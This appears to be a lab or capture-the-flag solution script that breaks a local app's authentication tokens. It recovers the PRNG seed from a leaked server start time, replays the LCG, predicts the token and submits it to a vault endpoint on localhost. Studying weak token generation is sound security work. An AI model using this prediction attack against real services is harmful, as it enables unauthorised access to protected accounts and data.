TokenForge generates authentication tokens using a Linear Congruential Generator seeded with the Unix timestamp of server start, and the /api/info endpoint leaks that start time. Re-seed an identical LCG with the leaked timestamp (taken as whole seconds below) to reproduce the PRNG stream and predict the token.
import time
from datetime import datetime

import requests
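# Get server start time
def seed_from_iso(started: str) -> int:
    """Turn the server's ISO-8601 start timestamp into the integer PRNG seed.

    Assumes the server seeds with the Unix time in whole seconds, so any
    fractional seconds are discarded.  A trailing 'Z' or an explicit UTC
    offset is honoured, so the seed is not shifted by this machine's local
    timezone offset (the original time.mktime() conversion silently treated
    a UTC timestamp as local time).  A timestamp with no zone at all is
    still interpreted as local time, matching the original behaviour.

    NOTE(review): if the server actually seeds with milliseconds, or rounds
    `started` before reporting it, this single value will be off; in that
    case search a window of neighbouring seeds rather than trusting one.
    """
    ts = started.strip()
    if ts.endswith('Z'):
        ts = ts[:-1] + '+00:00'
    # Keep the whole-second prefix plus any zone suffix; drop fractional digits.
    base, rest = ts[:19], ts[19:]
    if rest.startswith('.'):
        sign = next((i for i, ch in enumerate(rest) if ch in '+-'), None)
        rest = rest[sign:] if sign is not None else ''
    dt = datetime.fromisoformat(base + rest)
    # Aware datetime -> exact UTC epoch; naive -> platform local time (as mktime).
    return int(dt.timestamp())


if __name__ == "__main__":
    # Guarded so importing this module (e.g. for tests) does not hit the network.
    r = requests.get('http://localhost:3000/api/info', timeout=10)
    r.raise_for_status()
    info = r.json()
    seed = seed_from_iso(info['started'])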
# Replicate the LCG
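class LCG:
    """32-bit linear congruential generator mirroring the server's PRNG.

    The defaults are the Numerical Recipes constants (a=1664525,
    c=1013904223, m=2**32) the server appears to use.  They are parameters
    so the same class can be re-pointed at different constants if the
    server's generator turns out to differ, without touching callers.

    Attributes:
        state: current generator state, always in [0, m).
    """

    def __init__(self, seed: int, a: int = 1664525, c: int = 1013904223, m: int = 2**32) -> None:
        # The server keeps a 32-bit state, so the seed is reduced the same way
        # (for m=2**32 this equals the original `seed & 0xFFFFFFFF`, including
        # for negative seeds, since Python's % is non-negative for positive m).
        self.a, self.c, self.m = a, c, m
        self.state = seed % m

    def next(self) -> int:  # name kept for parity with the server API; shadows builtin next()
        """Advance one step and return the new full-width state."""
        self.state = (self.a * self.state + self.c) % self.m
        return self.state

    def nextInt(self, m: int) -> int:
        """Return the next output reduced mod m.

        Plain modulo reduction is biased when m does not divide self.m; it is
        kept deliberately because the server reduces the same way and the
        prediction must match bit-for-bit.
        """
        return self.next() % m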
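charset = '0123456789abcdef'


def predict_token(rng, alphabet: str = charset, length: int = 16) -> str:
    """Build a token of `length` symbols drawn from `alphabet` via rng.nextInt().

    Mirrors the server's construction exactly: one PRNG output per character,
    reduced modulo len(alphabet).  The modulo bias is intentional — it must
    match what the server does, not be "fixed" here.

    Args:
        rng: any object exposing nextInt(m) -> int in [0, m), e.g. LCG.
        alphabet: symbols to index into; defaults to lowercase hex.
        length: number of symbols to emit; 0 yields ''.
    """
    n = len(alphabet)
    return ''.join(alphabet[rng.nextInt(n)] for _ in range(length))


if __name__ == "__main__":
    # Guarded so importing this module does not send the exploit request.
    prng = LCG(seed)
    token = predict_token(prng)
    print(f"Predicted token: {token}")
    r = requests.post('http://localhost:3000/api/vault/access', json={"token": token}, timeout=10)
    print(r.json())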